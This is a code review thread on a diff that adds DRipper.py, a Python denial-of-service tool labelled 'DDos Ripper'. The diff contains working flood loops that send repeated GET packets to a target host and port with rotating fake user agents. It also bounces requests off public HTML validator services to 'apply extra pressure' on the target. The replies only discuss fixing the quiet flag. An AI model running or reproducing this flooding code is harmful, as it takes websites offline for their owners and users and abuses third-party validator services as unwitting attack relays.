DRipper.py

```diff
@@ -1,11 +1,163 @@
+                                                             reference by Hammer
+''')
+
+def user_agent():
+	global uagent
+	uagent=[]
+	uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
+	uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
+	uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
+	uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
+	uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
+	uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
+	uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
+	uagent.append("Mozilla / 5.0(X11;Linux i686; rv:81.0) Gecko / 20100101 Firefox / 81.0")
+	uagent.append("Mozilla / 5.0(Linuxx86_64;rv:81.0) Gecko / 20100101Firefox / 81.0")
+	uagent.append("Mozilla / 5.0(X11;Ubuntu;Linuxi686;rv:81.0) Gecko / 20100101Firefox / 81.0")
+	uagent.append("Mozilla / 5.0(X11;Ubuntu;Linuxx86_64;rv:81.0) Gecko / 20100101Firefox / 81.0")
+	uagent.append("Mozilla / 5.0(X11;Fedora;Linuxx86_64;rv:81.0) Gecko / 20100101Firefox / 81.0")
+	return(uagent)
+
+
+#Validators are used as bonus external bots that apply extra pressure to the host while trying to validate it
+def validators():
+	global vals
+	vals=[]
+	vals.append("https://validator.w3.org/nu/?doc=http://")
+	vals.append("https://validator.w3.org/checklink?uri=http://")
+	vals.append("https://html5.validator.nu/?doc=http://")
+	return(vals)
+
+
+def bot_rippering(url):
+	try:
+		while True:
+			req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
+			print("\033[95mbot is rippering...\033[0m")
+			time.sleep(.1)
+	except:
+		time.sleep(.1)
+
+
+def down_it():
+	try:
+		while True:
+			packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
+			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+			s.connect((host,int(port)))
+			if s.sendto( packet, (host, int(port)) ):
+				s.shutdown(1)
+				print ("\033[92m",time.ctime(time.time()),"\033[0m \033[92m <--packet sent! rippering--> \033[0m")
+			else:
+				s.shutdown(1)
+				print("\033[91mshut<->down\033[0m")
+			time.sleep(.1)
+	except socket.error as e:
+		print("\033[91mno connection! web server maybe down!\033[0m")
+		#print("\033[91m",e,"\033[0m")
+		time.sleep(.1)
+
+
+def dos():
+	while True:
+		down_it()
+
+
+def dos2():
+	while True:
+		bot_rippering(random.choice(vals)+host)
+
+
+def usage():
+	print (''' \033[0;95mDDos Ripper 
+	Usage : python3 dripper.py [-s] [-p] [-t] [-q]
+	-h : -help
+	-s : -server ip
+	-p : -port default 80
+	-q : -quiet
```

Comment:
I think that `-q` is not really quiet mode. With or without output is the same.

Reply:
-q changes the logging level of messages from ERROR to INFO. The thing is, it never uses the logger afterward. So yeah, good stuff, it's practically useless currently. I will fix it shortly

Reply:
> I will fix it shortly

Great, Thanks in advance.

Reply:
Done, now with -q only the errors are shown